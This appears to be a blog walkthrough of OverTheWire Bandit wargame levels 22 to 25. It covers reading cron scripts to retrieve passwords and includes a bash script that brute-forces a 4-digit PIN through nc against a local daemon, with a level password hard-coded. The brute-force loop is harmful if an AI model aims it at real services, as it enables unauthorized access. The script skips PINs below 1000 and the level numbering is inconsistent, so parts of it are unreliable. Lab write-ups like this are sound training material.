This is overthewire series with bandit walkthrough from level 23 – 26. If you haven’t gone through the previous articles on OVERTHEWIRE Bandit then follow the links below!
Level 22 – 23
Login into bandit22 with the password we obtained in the article above.
The hint for this level says:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
So I looked into /etc/cron.d and found cronjob_bandit23
There is a script called cronjob_bandit23.sh which is running. When you cat this script, you will find :
It is taking the current user and storing its value in myname variable
It is then storing the value of the md5 hash of the current user profile into the variable called mytarget.
Then it is coping the password from etc/bandit_pass/levelname to /tmp/md5hash generated above.
The script seems pretty obvious so. I individually ran the lines of the script to get the value and password.
The above screenshot is the password for the level 23.
LEVEL 23 – 24
Login as bandit23 with the password obtained above.
This level is similar to the last level.
The hint says:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
You don’t have to create a script or anything.
The password can be easily obtained by the steps we followed in the last level. If you want you can create a script!
The above code is nothing but the deletion code.The hint says that our script will be deleted once we execute it. This piece of code does that!
I have used the above strategy to get the password for level 24!
LEVEL 24 -25:
Login as bandit24 with above credentials.
The hint for this level says:
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
The above screenshot is the output for the nc command when I connected localhost at 30002 from bandit24 login.
In this particular level we need to create a script that will brute force the pincode for this level.
My script is:
#!/bin/bash
ban24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {1000..10000}
do
b=$(echo $ban24" "$i | nc localhost 30002)
if [[ $b != *"Wrong"* ]]
then
echo "Pin is: $i "
echo "$ban24 $i" |nc localhost 30002
break
fi
echo "trying pin" $i
echo "$b"
done
You will have to wait patiently for million years and then it will give you the *password*.
The link for level 26 is here